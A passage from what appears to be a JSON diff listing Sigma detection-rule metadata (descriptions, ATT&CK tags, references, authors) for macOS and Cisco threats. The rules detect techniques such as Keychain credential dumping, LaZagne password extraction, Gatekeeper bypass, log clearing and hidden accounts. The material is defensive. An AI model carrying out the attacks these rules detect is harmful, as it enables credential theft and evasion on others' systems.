"attack.privilege_escalation", - "attack.t1546.014" - ], - "creation_date": "2020/10/23", - "filename": "file_event_macos_emond_launch_daemon.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "file_event", - "logsource.product": "macos" - } - }, - { - "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", - "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", - "value": "Startup Items", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1037.005" - ], - "creation_date": "2020/10/14", - "filename": "file_event_macos_startup_items.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "file_event", - "logsource.product": "macos" - } - }, - { - "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", - "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", - "value": "MacOS Scripting Interpreter AppleScript", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.002" - ], - "creation_date": "2020/10/21", - "filename": "proc_creation_macos_applescript.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Application installers might contain scripts as part of the installation process." - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", - "value": "Decode Base64 Encoded Text -MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_base64_decode.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", - "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", - "value": "Binary Padding - MacOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_binary_padding.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate script work" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files", - "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", - "value": "File Time Attribute Change", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_change_file_time_attr.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects deletion of local audit logs", - "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", - "value": "Indicator Removal on Host - Clear Mac System Logs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_macos_clear_system_logs.yml", - "author": "remotephone, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", - "value": "Creation Of A Local User Account", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_macos_create_account.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", - "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", - "value": "Hidden User Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ], - "creation_date": "2020/10/10", - "filename": "proc_creation_macos_create_hidden_account.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects passwords dumps from Keychain", - "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", - "value": "Credentials from Password Stores - Keychain", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", - "https://gist.github.com/Capybara/6228955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_creds_from_keychain.yml", - "author": "Tim Ismilyaev, oscd.community, Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects disabling security tools", - "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", - "value": "Disable Security Tools", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_disable_security_tools.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of system utilities to discover files and directories", - "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", - "value": "File and Directory Discovery - MacOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_file_and_directory_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detecting attempts to extract passwords with grep and laZagne", - "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", - "value": "Credentials In Files", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_find_cred_in_files.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects attempts to use system dialog prompts to capture user credentials", - "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", - "value": "GUI Input Capture - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", - "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1056.002" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_macos_gui_input_capture.yml", - "author": "remotephone, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration tools and activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local systeam accounts on MacOS", - "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", - "value": "Local System Accounts Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_macos_local_account.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local system groups", - "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", - "value": "Local Groups Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_macos_local_groups.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local or remote network services.", - "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", - "value": "MacOS Network Service Scanning", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/10/21", - "filename": "proc_creation_macos_network_service_scanning.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", - "value": "Network Sniffing - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2020/10/14", - "filename": "proc_creation_macos_network_sniffing.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", - "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", - "value": "Payload Decoded and Decrypted via Built-in Utilities", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" - ], - "tags": [ - "attack.t1059", - "attack.t1204", - "attack.execution", - "attack.t1140", - "attack.defense_evasion", - "attack.s0482", - "attack.s0402" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the enumeration of other remote systems.", - "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", - "value": "Macos Remote System Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2020/10/22", - "filename": "proc_creation_macos_remote_system_discovery.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", - "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", - "value": "Scheduled Cron Task/Job - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_macos_schedule_task_job_cron.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects attempts to use screencapture to collect macOS screenshots", - "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", - "value": "Screen Capture - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_macos_screencapture.yml", - "author": "remotephone, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate user activity taking screenshots" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", - "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", - "value": "Security Software Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_security_software_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", - "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", - "value": "Space After Filename - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.006" - ], - "creation_date": "2021/11/20", - "filename": "proc_creation_macos_space_after_filename.yml", - "author": "remotephone", - "level": "low", - "falsepositive": [ - "Mistyped commands or legitimate binaries named to match the pattern" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", - "value": "Split A File Into Pieces", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_macos_split_file_into_pieces.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", - "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", - "value": "Suspicious Execution via macOS Script Editor", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", - "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.002", - "attack.initial_access", - "attack.t1059", - "attack.t1059.002", - "attack.t1204", - "attack.t1204.001", - "attack.execution", - "attack.persistence", - "attack.t1553", - "attack.defense_evasion" - ], - "creation_date": "2022/10/21", - "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects commandline operations on shell history files", - "uuid": "508a9374-ad52-4789-b568-fc358def2c65", - "value": "Suspicious History File Operations", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_macos_susp_histfile_operations.yml", - "author": "Mikhail Larin, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", - "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", - "value": "Suspicious MacOS Firmware Activity", - "meta": { - "refs": [ - "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", - "https://www.manpagez.com/man/8/firmwarepasswd/", - "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/30", - "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of system utilities to discover system network connections", - "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", - "value": "System Network Connections Discovery - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_system_network_connections_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects enumeration of local network configuration", - "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", - "value": "System Network Discovery - macOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_macos_system_network_discovery.yml", - "author": "remotephone, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", - "value": "System Shutdown/Reboot - MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_system_shutdown_reboot.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", - "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", - "value": "Potential WizardUpdate Malware Infection", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects macOS Gatekeeper bypass via xattr utility", - "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", - "value": "Gatekeeper Bypass via Xattr", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", - "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", - "value": "Potential XCSSET Malware Infection", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_macos_xcsset_malware_infection.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Clear command history in network OS which is used for defense evasion", - "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", - "value": "Cisco Clear Logs", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_clear_logs.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Collect pertinent data from the configuration files", - "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", - "value": "Cisco Collect Data", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" - ], - "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.collection", - "attack.t1087.001", - "attack.t1552.001", - "attack.t1005" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_collect_data.yml", - "author": "Austin Clark", - "level": "low", - "falsepositive": [ - "Commonly run by administrators" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Show when private keys are being exported from the device, or when new certificates are installed", - "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", - "value": "Cisco Crypto Commands", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1553.004", - "attack.t1552.004" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_crypto_actions.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "Not commonly run by administrators. Also whitelist your known good certificates" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Turn off logging locally or remote", - "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", - "value": "Cisco Disabling Logging", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], 